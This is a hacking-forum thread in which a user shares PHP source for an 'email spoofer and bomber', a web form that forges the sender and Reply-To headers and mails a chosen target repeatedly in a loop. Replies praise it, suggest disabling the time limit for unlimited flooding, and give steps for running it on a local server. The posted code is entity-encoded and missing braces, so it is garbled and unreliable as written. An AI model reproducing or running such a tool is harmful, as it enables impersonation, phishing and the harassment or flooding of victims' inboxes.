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Email spoofer & bomber

ghost's Avatar
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I wrote an email spoofer and bomber. Here's the code :) For those that dont have an apache server, use it at my website: [removed due to newbie spam] Timeout is set to 240 seconds(4 minutes), that are about 40 emails, you can always set the timeout higher for more emails :) change it to 600 seconds for 10 minutsn etc…


<?php //WRITTEN BY SUPERPIMP //[removed due to newbie spam] //timeout limit for script set_time_limit(240); //send mail function send_mail(){ echo "<font face='georgia' size='2'>\r\n";

$headers=&quot;From: &quot;.$from.&quot;&#92;r&#92;nReply-To: &quot;.$reply;

if(isset($to) && isset($from) && isset($message) && $num!=NULL){
    foreach($counter as $counter)
        if (mail($to, $subject, $message, $headers)){
            echo &quot;&lt;title&gt;Mail sent!&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;&lt;p&gt;Mail n° &quot;.$counter.&quot; succesfully sent!&#92;r&#92;n&quot;;
        else {
            echo &quot;&lt;title&gt;Mail not sent&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;Mail n° &quot;.$counter.&quot;couldn&#39;t be sent, please try again.&#92;r&#92;n&quot;;
        if (@mail($to, $subject, $message, $headers)){
            echo &quot;&lt;title&gt;Mail sent!&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;&lt;p&gt;Mail succesfully sent!&#92;r&#92;n&quot;;
        else {
            echo &quot;&lt;title&gt;Mail not sent&lt;/title&gt;&#92;r&#92;n&quot;;
            echo &quot;Mail couldn&#39;t be sent, please try again.&#92;r&#92;n&quot;;
    echo &quot;Please fill in all necessary fields.&quot;;

} //display mail form function mail_form() { echo <<<DISPLAY_FORM <head> <title>Email Spoofer/Bomber</title> <font face='tahoma' size='3'> <u>Email Spoofer/Bomber</u> </head> <body> <p> <font face='tahoma' size='2'> <table><form action='index.php' method='post'> <tr><td>receiver:</td><td> <INPUT class='field' type='text' name='to' size='50'></td></tr> <tr><td>your email:</td><td> <INPUT class='field' type='text' name='from' size='50'></td></tr> <tr><td>reply email:</td><td> <INPUT class='field' type='text' name='reply' size='50'></td></tr> <tr><td>subject:</td><td> <INPUT class='field' type='text' name='subject' size='50'></td></tr> <tr><td>send email</td><td> <INPUT class='field' type='integer' name='num' size='10'> times</td></tr> <tr><td>text:</td><td><textarea name='textarea' cols='50' rows='10'>Type your message here.</textarea></td></tr> <input type="hidden" name="send" value="1"> <tr><td><INPUT class=button type=submit value='Send!' action='index.php'></form></td></tr></table> <tr><td><p>Warning: bombing an email takes a while, please be patient!</td></tr> <p> </p> <p> <i>Note: the website admin cannot be held responsible for possible abuse of this email script.</i> </body> </html> DISPLAY_FORM; }


//execute functions if(isset($send)){ send_mail(); } else{ mail_form(); } ?>

ghost's Avatar
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i&#39;m not sure but dosn&#39;t this belonge in the code bank? but its a great piece of code that must be said :D

Mr_Cheese's Avatar
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nice work. you should submit it into the code bank.

ghost's Avatar
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I dont understand what it is supposed to do is it like a code for a webpage

Mr_Cheese's Avatar
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superpimp wrote: Timeout is set to 240 seconds(4 minutes), that are about 40 emails, you can always set the timeout higher for more emails :) change it to 600 seconds for 10 minutsn etc…

or just set it to 0 so it doesnt have a time limit :)

ghost's Avatar
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Wow– this is niice. It's good to write small apps like this.. You should start writing MODs for phpbb or IPB.. or any program but.. good to start small.

ghost's Avatar
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thanks :) I thought I'd post it here because if I post it in the code bank no-one notices :P @hacking_noob: it's the source code of a php page, add it to somepage.php, if you have an apache server set up, you can run the script. Get one here: http://www.wampserver.com/ Place the file in the www dir (standard: c:\wamp\www\) and then go to your browser and type localhost/somepage.php and you can run it :D